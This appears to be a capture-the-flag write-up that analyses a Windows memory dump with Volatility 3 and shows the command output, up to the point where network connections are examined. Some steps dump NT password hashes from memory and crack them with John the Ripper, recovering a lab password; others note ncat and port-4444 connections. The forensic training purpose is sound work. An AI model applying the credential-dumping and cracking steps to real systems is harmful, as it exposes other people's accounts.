Similar to "Solving the CTF challenge - Network Forensics (packet and log analysis), USB Disk Forensics, Database Forensics, Stego" this challenge is meant to support our team's development.
This challenge can be looked at from both the Blue and Red Team perspectives.
Blue team because, this is how we hope to find threats either from a "live" system or more specifically, in this case, from the contents of extracted memory, i.e. memory dumps, crash dumps, etc.
Red teams because threat actors can steal memory dumps to gain access to sensitive information. For those thinking this is far fetched, see this link for more info on a recent compromise, that occurred at Microsoft: Results of Major Technical Investigations for Storm-0558 Key Acquisition | MSRC Blog | Microsoft Security Response Center.
Here is a brief from the link:
"Our investigation found that a consumer signing system crash in April of 2021 resulted in a snapshot of the crashed process (“crash dump”). The crash dumps, which redact sensitive information, should not include the signing key. In this case, a race condition allowed the key to be present in the crash dump ..."
After April 2021, when the key was leaked to the corporate environment in the crash dump, the Storm-0558 actor was able to successfully compromise a Microsoft engineer’s corporate account. This account had access to the debugging environment containing the crash dump which incorrectly contained the key. Due to log retention policies, we don’t have logs with specific evidence of this exfiltration by this actor, but this was the most probable mechanism by which the actor acquired the key."
As seen above, memory can and does contain a lot of sensitive information. More importantly, it is not in every incident you will have all the logs as mentioned above.
With that in mind, Welcome to **Total Recall 2024** where we try to build our memory forensics skills while having fun.
Scenario:
As the Lead Incident Handler at **TOTAL RECALL Inc.** a memory
forensics company, you have been assigned a case to determine the extent of a
possible compromise at a highly confidential client. The client has followed
the NIST 800-86 Guide to Integrating Forensic Techniques into Incident Response
and have done the evidence collection. Your job, is to examine, analyze and
report on this potential incident.
As you answer the client’s questions, you should take notes, draw diagrams, etc.
Here are 10 things, you are guaranteed to learn by completing this challenge:
1. Memory Forensics: This is our primary objective!
2. Extracting credentials from memory: Not just
passwords, but also web server (certificates) public and private key
information. Similar
to what happened with this compromise at Microsoft. This allows us to
encrypt/decrypt, sign and verify items on the compromised server behalf.
3. Perform network forensics (log analysis):
Yep! We extract the logs from the memory to learn more about the attack.
4. Basic Malware Analysis: That's correct!
Extracting/Reconstructing executables from memory and doing basic static
analysis.
5. Attack(s) identification: Learning to attribute
a particular tactic and or technique to a compromise.
6. Vulnerability Research: Find the version of
software and any known vulnerabilities associated with same.
7. Recovering PowerShell history from memory.
8. Web Server configuration at the time of
compromise.
9. Detecting persistence in memory.
10. Lots of fun learning about memory forensics.
Good luck and have fun learning!
Data for this challenge
Note: Try downloading the individual files if you have a problem downloading the entire package.
My write-up for the challenge, so that readers can walk or follow through.
These first few questions allow us to learn about the received memory image, before performing any analysis.
When performing forensics, one of the first steps, is confirming the file integrity is intact.
┌──(kali㉿securitynik)-[~/CHALLENGES] └─$ md5sum TOTAL_RECALL_2024.zip --tag MD5 (TOTAL_RECALL_2024.zip) = 7dceb1fcae2ed8beacc8f81f85bf935c
┌──(kali㉿securitynik)-[~/CHALLENGES] └─$ cat TOTAL_RECALL_2024.md5sum 7dceb1fcae2ed8beacc8f81f85bf935c TOTAL_RECALL_2024.zip
┌──(kali㉿securitynik)-[~/CHALLENGES] └─$ unzip ChristmasChallenge2023.zip -d TOTAL_RECALL_2024/ Archive: ChristmasChallenge2023.zip inflating: TOTAL_RECALL_2024/SECURITYNIK-WIN-20231116-235706.dmp inflating: TOTAL_RECALL_2024/SECURITYNIK-WIN-20231116-235706.json
┌──(kali㉿securitynik)-[~/CHALLENGES] └─$ cd TOTAL_RECALL_2024/
Q: What is the SHA256 hash of the file containing the memory dump?
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ sha256sum SECURITYNIK-WIN-20231116-235706.dmp cabe2fd543eac1cd2eab9ccd0a840d83481a3f00e16015287323b2cb44fe0686 SECURITYNIK-WIN-20231116-235706.dmp
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ls -l SECURITYNIK-WIN-20231116-235706.dmp -l -rw-r--r-- 1 kali kali 4293816320 Nov 16 18:57 SECURITYNIK-WIN-20231116-235706.dmp
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat SECURITYNIK-WIN-20231116-235706.json | grep fileInfo --after-context=2 "fileInfo": { "fileSize": 4293816320, "sha256": "cabe2fd543eac1cd2eab9ccd0a840d83481a3f00e16015287323b2cb44fe0686"
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat SECURITYNIK-WIN-20231116-235706.json | grep machineInfo --after-context=9 "machineInfo": { "architectureType": "x64", "date": "2023-11-16T23:57:55.647Z", "domainName": "SECURITYNIK", "machineId": "3A424D56-BF4F-0582-FA8B-86105F2A025C", "machineName": "SECURITYNIK-WIN", "maxPhysicalMemory": 5368709120, "numberProcessors": 2, "timestamp": 133446526281339811, "userName": "securitynik"
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat SECURITYNIK-WIN-20231116-235706.json | grep osVersion --after-context=7 "osVersion": { "buildNumber": 22621, "majorVersion": 10, "minorVersion": 0, "productType": 1, "servicePackMajor": 0, "servicePackMinor": 0, "suiteMask": 256
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat SECURITYNIK-WIN-20231116-235706.json | grep serviceInfo --after-context=7 "serviceInfo": { "acquisitionTime": "0:47", "ntStatus": 0, "serviceName": "DumpIt", "serviceVersion": "3.0.20180307.1", "totalAccessiblePages": 1048293, "totalInaccessiblePages": 0, "totalPhysicalPages": 1048293
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.info.Info Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished Variable Value Kernel Base 0xf8021f400000 DTB 0x1ae000 Symbols file:///home/kali/volatility3/volatility3/symbols/windows/ntkrnlmp.pdb/9DC3FC69B1CA4B34707EBC57FD1D6126-1.json.xz Is64Bit True IsPAE False layer_name 0 WindowsIntel32e memory_layer 1 WindowsCrashDump64Layer base_layer 2 FileLayer KdVersionBlock 0xf802200099b0 Major/Minor 15.22621 MachineType 34404 KeNumberProcessors 2 SystemTime 2023-11-16 23:57:55 NtSystemRoot C:\Windows NtProductType NtProductWinNt NtMajorVersion 10 NtMinorVersion 0 PE MajorOperatingSystemVersion 10 PE MinorOperatingSystemVersion 0 PE Machine 34404 PE TimeDateStamp Mon Jul 16 20:24:05 2063
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.sessions.Sessions > sessions.txt Progress: 100.00 PDB scanning finished
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat sessions.txt | awk --field-separator=' ' '{ print $1 }' | sort --unique 0 1
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.envars.Envars > envars.txt
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ grep --perl-regexp 'ComSpec.*' envars.txt --only-matching | sort --unique ComSpec C:\Windows\system32\cmd.exe
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ grep --perl-regexp 'USERNAME.*' envars.txt --only-matching | sort --unique USERNAME LOCAL SERVICE USERNAME securitynik USERNAME SECURITYNIK-WIN$ USERNAME SYSTEM
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ grep --perl-regexp 'OS.*' envars.txt --only-matching | sort --unique OS Windows_NT
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ grep --perl-regexp 'COMPUTERNAME.*' envars.txt --only-matching | sort --unique COMPUTERNAME SECURITYNIK-WIN
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.hashdump.Hashdump Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished User rid lmhash nthash Administrator 500 aad3b435b51404eeaad3b435b51404ee 23e1d10001876b0078a9a779017fc026 Guest 501 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0 DefaultAccount 503 aad3b435b51404eeaad3b435b51404ee 31d6cfe0d16ae931b73c59d7e0c089c0 WDAGUtilityAccount 504 aad3b435b51404eeaad3b435b51404ee 33651ad684b9bfb2e11f422d80b16ceb securitynik 1001 aad3b435b51404eeaad3b435b51404ee 23e1d10001876b0078a9a779017fc026 nakia 1003 aad3b435b51404eeaad3b435b51404ee f1c216dcadb73b5960bbcdf03bf3bbe0
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.hashdump.Hashdump > hashdump.txt
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat hashdump.txt | sed -e "s/\s/:/g;1,4d" Administrator:500:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:33651ad684b9bfb2e11f422d80b16ceb securitynik:1001:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026 nakia:1003:aad3b435b51404eeaad3b435b51404ee:f1c216dcadb73b5960bbcdf03bf3bbe0 ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat hashdump.txt | sed -e "s/\s/:/g;1,4d" > new_hashdump.txt
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ john --format=nt new john --format=nt new_hashdump.txt Created directory: /home/kali/.john Using default input encoding: UTF-8 Loaded 6 password hashes with no different salts (NT [MD4 128/128 AVX 4x3]) Warning: no OpenMP support for this hash type, consider --fork=4 Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, almost any other key for status Almost done: Processing the remaining buffered candidate passwords, if any. Proceeding with wordlist:/usr/share/john/password.lst (Guest) (DefaultAccount) Testing1 (Administrator) Testing1 (securitynik) Proceeding with incremental:ASCII 4g 0:00:06:42 3/3 0.009944g/s 34234Kp/s 34234Kc/s 68468KC/s ccr2brim..ccr2br04 Use the "--show --format=NT" options to display all of the cracked passwords reliably Session aborted
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat new_hashdump.txt | awk --field-separator=':' '{ print $4 }' 23e1d10001876b0078a9a779017fc026 31d6cfe0d16ae931b73c59d7e0c089c0 31d6cfe0d16ae931b73c59d7e0c089c0 33651ad684b9bfb2e11f422d80b16ceb 23e1d10001876b0078a9a779017fc026 f1c216dcadb73b5960bbcdf03bf3bbe0
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ john --show --format=nt new_hashdump.txt Administrator:Testing1:500:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026 Guest::501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 DefaultAccount::503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 securitynik:Testing1:1001:aad3b435b51404eeaad3b435b51404ee:23e1d10001876b0078a9a779017fc026
(Guest) (DefaultAccount) Testing1 (Administrator) Testing1 (securitynik)
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.pslist.PsList > pslist.txt Progress: 100.00 PDB scanning finished
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ls pslist.txt pslist.txt
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pslist.txt | sed '1,4d' | awk --field-separator=' ' '{ print $3 }' | sort | uniq --count | sort --numeric-sort --reverse | grep --perl-regexp '\s+?1\s+' | wc --lines 49
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pslist.txt | sed '1,4d' | awk --field-separator=' ' '{ print $3 }' | sort | uniq --count | sort --numeric-sort --reverse | wc --lines 68
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pslist.txt | wc --lines 224 ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pslist.txt | sed '1,4d' | wc --lines 220
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pslist.txt | sed '1,4d' | awk --field-separator=' ' '{ print $3 }' | sort | uniq --count | sort --numeric-sort --reverse | head --lines=10 78 svchost.exe 15 MoNotification 12 cmd.exe 12 chrome.exe 9 conhost.exe 8 msedge.exe 6 RuntimeBroker. 6 powershell.exe 4 OpenConsole.ex 3 dllhost.exe
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pslist.txt | sed '1,4d;$d' | grep 'svchost.exe' | sed '2,77d' 884 696 svchost.exe 0xe78bf2c90080 19 - 0 False 2023-11-16 19:09:13.000000 N/A Disabled 2220 696 svchost.exe 0xe78bf70870c0 5 - 0 False 2023-11-16 23:56:45.000000 N/A Disabled
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pslist.txt | grep "N/A" | awk --field-separator=' ' '{ print $3 }' | sort | uniq --count | sort --numeric-sort --reverse | wc --lines 66
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pslist.txt | grep "N/A" --invert-match Volatility 3 Framework 2.5.2 PID PPID ImageFileName Offset(V) Threads Handles SessionId Wow64 CreateTime ExitTime File output 5556 696 svchost.exe 0xe78bf33a80c0 0 - 0 False 2023-11-16 19:12:58.000000 2023-11-16 19:13:04.000000 Disabled 2992 1548 powershell.exe 0xe78bf3d6e0c0 0 - 0 False 2023-11-16 19:18:05.000000 2023-11-16 19:18:06.000000 Disabled 2252 2992 powershell.exe 0xe78bf435f0c0 0 - 0 False 2023-11-16 19:18:06.000000 2023-11-16 22:01:47.000000 Disabled 5708 1280 TabTip.exe 0xe78bf42321c0 0 - 1 False 2023-11-16 19:24:25.000000 2023-11-16 19:25:14.000000 Disabled 3040 768 userinit.exe 0xe78bf517f080 0 - 1 False 2023-11-16 19:24:46.000000 2023-11-16 19:25:17.000000 Disabled 7040 1100 msedge.exe 0xe78bf4e300c0 0 - 1 False 2023-11-16 19:25:26.000000 2023-11-16 21:19:45.000000 Disabled 484 4776 MoNotification 0xe78bf46ef080 0 - 1 False 2023-11-16 19:30:34.000000 2023-11-16 19:54:19.000000 Disabled 1012 4776 MoNotification 0xe78bf51750c0 0 - 1 False 2023-11-16 19:54:18.000000 2023-11-16 19:54:19.000000 Disabled 3148 4776 MoNotification 0xe78bf428c0c0 0 - 1 False 2023-11-16 19:54:19.000000 2023-11-16 19:54:37.000000 Disabled 2816 4776 MoNotification 0xe78bf4fc30c0 0 - 1 False 2023-11-16 19:54:37.000000 2023-11-16 20:26:01.000000 Disabled 4908 4776 MoNotification 0xe78bf4ec9080 0 - 1 False 2023-11-16 20:26:00.000000 2023-11-16 20:26:01.000000 Disabled 6168 4776 MoNotification 0xe78bf32c4080 0 - 1 False 2023-11-16 20:26:01.000000 2023-11-16 20:27:32.000000 Disabled 5348 4776 MoNotification 0xe78bf4ebe080 0 - 1 False 2023-11-16 20:27:32.000000 2023-11-16 21:34:07.000000 Disabled 8848 4776 MoNotification 0xe78bf689b0c0 0 - 1 False 2023-11-16 21:34:06.000000 2023-11-16 21:34:07.000000 Disabled 7200 4776 MoNotification 0xe78bf62da0c0 0 - 1 False 2023-11-16 21:34:07.000000 2023-11-16 21:35:30.000000 Disabled 4116 4776 MoNotification 0xe78bf61950c0 0 - 1 False 2023-11-16 21:35:30.000000 2023-11-16 22:55:10.000000 Disabled 488 4000 VMwareResoluti 0xe78bf2b65080 0 - 1 False 2023-11-16 21:37:30.000000 2023-11-16 21:37:31.000000 Disabled 5176 7164 cmd.exe 0xe78bf52e9080 0 - 1 False 2023-11-16 22:03:58.000000 2023-11-16 22:06:04.000000 Disabled 4120 5508 powershell.exe 0xe78bf6961080 0 - 0 False 2023-11-16 22:08:06.000000 2023-11-16 22:08:31.000000 Disabled 2860 4776 MoNotification 0xe78bf671b0c0 0 - 1 False 2023-11-16 22:55:10.000000 2023-11-16 22:55:10.000000 Disabled 5424 4776 MoNotification 0xe78bf62ec0c0 0 - 1 False 2023-11-16 22:55:10.000000 2023-11-16 22:56:41.000000 Disabled 6764 4776 MoNotification 0xe78bf8e9c080 0 - 1 False 2023-11-16 22:56:41.000000 2023-11-16 23:56:45.000000 Disabled 2752 4776 MoNotification 0xe78bf67170c0 0 - 1 False 2023-11-16 23:56:44.000000 2023-11-16 23:56:45.000000 Disabled
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pslist.txt | grep "N/A" --invert-match | sed '1,4d' | awk --field-separator=' ' '{ print $3 }' | sort --unique | wc --lines 8
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pslist.txt | grep "N/A" --invert-match | sed '1,4d' | awk --field-separator=' ' '{ print $3 }' | sort --unique cmd.exe MoNotification msedge.exe powershell.exe svchost.exe TabTip.exe userinit.exe VMwareResoluti
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pslist.txt | grep --ignore-case "MSMp" 4032 696 MsMpEng.exe 0xe78bf38b5080 14 - 0 False 2023-11-16 19:09:46.000000 N/A Disabled
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --output-dir ssh_logs/ --file SECURITYNIK-WIN-20231116-235706.dmp windows.joblinks.JobLinks> job_links.txt Progress: 100.00 PDB scanning finished ┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat job_links.txt | head --lines=6 Volatility 3 Framework 2.5.2 Offset(V) Name PID PPID Sess JobSess Wow64 Total Active Term JobLink Process 0xe78bf38b5080 MsMpEng.exe 4032 696 0 0 False 25 1 0 N/A (Original Process) * 0xe78bf38b5080 MsMpEng.exe 4032 696 0 0 False 0 0 0 Yes C:\Program Files\Windows Defender\MsMpEng.exe
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pslist.txt | grep --ignore-case "mysql" 9044 8100 mysqld.exe 0xe78bf4fa5080 30 - 1 False 2023-11-16 23:26:13.000000 N/A Disabled
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pslist.txt | grep http 10008 8100 httpd.exe 0xe78bf6fb6080 1 - 1 False 2023-11-16 23:26:15.000000 N/A Disabled 5088 10008 httpd.exe 0xe78bf61b9080 156 - 1 False 2023-11-16 23:26:16.000000 N/A Disabled
First get the process tree information into a file:
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.pstree.PsTree > pstree.txt Progress: 100.00 PDB scanning finished
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pstree.txt | grep http **** 10008 8100 httpd.exe 0xe78bf6fb6080 1 - 1 False 2023-11-16 23:26:15.000000 N/A ***** 5088 10008 httpd.exe 0xe78bf61b9080 156 - 1 False 2023-11-16 23:26:16.000000 N/A
Update: After revisiting this, it seems my grep on http was incorrect. This caught the 156 threads column not the handles. I changed my technique and instead decided to put this into a CSV file.
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --renderer csv --file SECURITYNIK-WIN-20231116-235706.dmp windows.pstree.PsTree > pstree.csv
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.csv | awk --field-separator=',' '{ print $7 }' | sort | uniq
-
Handles
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --renderer csv --file SECURITYNIK-WIN-20231116-235706.dmp windows.pslist | cut -f 7 -d ',' | sort | uniq Volatility 3 Framework 2.5.2 Progress: 100.00 PDB scanning finished - Handles
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+884\s+' | wc --lines 23
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat pstree.txt | grep --perl-regexp '\s+884\s+'
** 884 696 svchost.exe 0xe78bf2c90080 19 - 0 False 2023-11-16 19:09:13.000000 N/A
*** 9736 884 backgroundTask 0xe78bf61b4080 7 - 1 False 2023-11-16 23:26:04.000000 N/A
*** 2576 884 TextInputHost. 0xe78bf33c1080 21 - 1 False 2023-11-16 19:25:22.000000 N/A
*** 6804 884 RuntimeBroker. 0xe78bf4e2d080 9 - 1 False 2023-11-16 19:25:24.000000 N/A
*** 7956 884 RuntimeBroker. 0xe78bf4e1e080 2 - 1 False 2023-11-16 19:57:25.000000 N/A
*** 3224 884 dllhost.exe 0xe78bf49c2080 7 - 1 False 2023-11-16 19:25:02.000000 N/A
*** 2168 884 WidgetService. 0xe78bf48c50c0 5 - 1 False 2023-11-16 19:30:23.000000 N/A
*** 2592 884 Microsoft.Phot 0xe78bf42bf0c0 15 - 1 False 2023-11-16 19:43:56.000000 N/A
*** 10152 884 smartscreen.ex 0xe78bf707a080 6 - 1 False 2023-11-16 23:56:53.000000 N/A
*** 820 884 ApplicationFra 0xe78bf52680c0 3 - 1 False 2023-11-16 19:30:26.000000 N/A
*** 6204 884 ShellExperienc 0xe78bf33c4080 31 - 1 False 2023-11-16 19:25:21.000000 N/A
*** 2748 884 RuntimeBroker. 0xe78bf4521080 7 - 1 False 2023-11-16 19:24:56.000000 N/A
*** 4944 884 WmiPrvSE.exe 0xe78bf3b95080 9 - 0 False 2023-11-16 19:09:59.000000 N/A
*** 8784 884 RuntimeBroker. 0xe78bf5cc3080 6 - 1 False 2023-11-16 23:56:45.000000 N/A
*** 5080 884 RuntimeBroker. 0xe78bf59c20c0 3 - 1 False 2023-11-16 19:43:59.000000 N/A
*** 3808 884 StartMenuExper 0xe78bf44cf080 16 - 1 False 2023-11-16 19:24:56.000000 N/A
*** 1376 884 RuntimeBroker. 0xe78bf49ac080 5 - 1 False 2023-11-16 19:24:57.000000 N/A
*** 1888 884 UserOOBEBroker 0xe78bf523b080 1 - 1 False 2023-11-16 19:30:30.000000 N/A
*** 1256 884 dllhost.exe 0xe78bf5ef3080 2 - 1 False 2023-11-16 22:50:53.000000 N/A
*** 1260 884 SearchHost.exe 0xe78bf44cc080 76 - 1 False 2023-11-16 19:24:56.000000 N/A
*** 1392 884 Widgets.exe 0xe78bf48e8080 5 - 1 False 2023-11-16 19:24:56.000000 N/A
*** 3448 884 SystemSettings 0xe78bf52350c0 20 - 1 False 2023-11-16 19:30:26.000000 N/A
*** 10108 884 backgroundTask 0xe78bf6ed10c0 8 - 1 False 2023-11-16 23:56:44.000000 N/A
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pstree.txt | grep --perl-regexp '\s+4668\s+|\s+2796\s+' ***** 2796 644 cmd.exe 0xe78bf68ce0c0 1 - 1 False 2023-11-16 21:29:22.000000 N/A ****** 4668 2796 chrome.exe 0xe78bf69ac0c0 43 - 1 False 2023-11-16 21:29:25.000000 N/A ******* 9152 4668 chrome.exe 0xe78bf65570c0 15 - 1 False 2023-11-16 21:29:25.000000 N/A ******* 6944 4668 chrome.exe 0xe78bf68a8080 15 - 1 False 2023-11-16 21:29:46.000000 N/A ******* 2392 4668 chrome.exe 0xe78bf658a0c0 18 - 1 False 2023-11-16 21:30:06.000000 N/A ******* 5188 4668 chrome.exe 0xe78bf6192080 15 - 1 False 2023-11-16 21:29:27.000000 N/A ******* 7364 4668 chrome.exe 0xe78bf4f60080 9 - 1 False 2023-11-16 21:29:40.000000 N/A ******* 904 4668 chrome.exe 0xe78c05e3d080 15 - 1 False 2023-11-16 21:29:49.000000 N/A ******* 7980 4668 chrome.exe 0xe78bf8e9b0c0 7 - 1 False 2023-11-16 21:29:25.000000 N/A ******* 1356 4668 chrome.exe 0xe78bf69ce0c0 10 - 1 False 2023-11-16 21:29:25.000000 N/A ******* 8628 4668 chrome.exe 0xe78bf69680c0 17 - 1 False 2023-11-16 21:30:11.000000 N/A ******* 8696 4668 chrome.exe 0xe78bf5337080 15 - 1 False 2023-11-16 21:29:31.000000 N/A ******* 9180 4668 chrome.exe 0xe78bf3b440c0 16 - 1 False 2023-11-16 21:29:25.000000 N/A
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat pstree.txt | grep ncat --before-context=2 ** 1652 696 svchost.exe 0xe78bf2fb1080 11 - 0 False 2023-11-16 19:09:18.000000 N/A *** 1432 1652 taskhostw.exe 0xe78bf42a4080 8 - 1 False 2023-11-16 19:24:45.000000 N/A *** 896 1652 ncat.exe 0xe78bf61d5080 1 - 1 True 2023-11-16 22:49:12.000000 N/A
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.psscan.PsScan > psscan.txt Progress: 100.00 PDB scanning finished
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat psscan.txt | sed '1,4d' | wc --lines 219
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ ~/volatility3/vol.py --file SECURITYNIK-WIN-20231116-235706.dmp windows.netstat.NetStat > netstat.txt Volatility was unable to read a requested page:nished Page error 0x1800000028 in layer layer_name (Page Fault at entry 0x0 in table page directory)
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat netstat.txt | sed '1,4d;$d' | wc --lines 50
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat netstat.txt | sed '1,4d;$d' | grep LISTEN | wc --lines 44
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netstat.txt | sed '1,4d;$d' | grep LISTEN
0xe78bf2daa340 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000
0xe78bf2daa340 TCPv6 :: 22 :: 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000
0xe78bf2daa4a0 TCPv4 0.0.0.0 22 0.0.0.0 0 LISTENING 3972 sshd.exe 2023-11-16 19:09:58.000000
0xe78bf3af4740 TCPv4 0.0.0.0 80 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af4740 TCPv6 :: 80 :: 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5920 TCPv4 0.0.0.0 80 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf274b4f0 TCPv4 0.0.0.0 135 0.0.0.0 0 LISTENING 412 svchost.exe 2023-11-16 19:09:15.000000
0xe78bf274b4f0 TCPv6 :: 135 :: 0 LISTENING 412 svchost.exe 2023-11-16 19:09:15.000000
0xe78bf00fd0d0 TCPv4 0.0.0.0 135 0.0.0.0 0 LISTENING 412 svchost.exe 2023-11-16 19:09:15.000000
0xe78bf274a470 TCPv4 10.0.0.108 139 0.0.0.0 0 LISTENING 4 System 2023-11-16 19:09:08.000000
0xe78bf3af5ea0 TCPv4 0.0.0.0 443 0.0.0.0 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5ea0 TCPv6 :: 443 :: 0 LISTENING 10008 httpd.exe 2023-11-16 23:26:16.000000
0xe78bf3af5be0 TCPv4 0.0.0.0 3306 0.0.0.0 0 LISTENING 9044 mysqld.exe 2023-11-16 23:26:13.000000
0xe78bf3af5be0 TCPv6 :: 3306 :: 0 LISTENING 9044 mysqld.exe 2023-11-16 23:26:13.000000
...
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat netstat.txt | sed '1,4d;$d' | grep EST | wc --lines 4
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024]
└─$ cat netstat.txt | sed '1,4d;$d' | grep EST
0xe78bf48cd010 TCPv4 10.0.0.108 4444 10.0.0.110 38159 ESTABLISHED - - -
0xe78bf533dac0 TCPv4 10.0.0.108 49957 10.0.0.110 443 ESTABLISHED - - N/A
0xe78bf4f0daa0 TCPv4 10.0.0.108 49685 10.0.0.101 4444 ESTABLISHED - - N/A
0xe78bf3ea6ae0 TCPv4 10.0.0.108 49686 10.0.0.110 22 ESTABLISHED - - N/A
┌──(kali㉿securitynik)-[~/CHALLENGES/TOTAL_RECALL_2024] └─$ cat netstat.txt | sed '1,4d;$d' | grep CLOSED 0xe78bf69bbb00 TCPv4 127.0.0.1 9999 127.0.0.1 50369 CLOSED - - N/A 0xe78bf33adaa0 TCPv4 127.0.0.1 9999 127.0.0.1 50366 CLOSED - - N/A
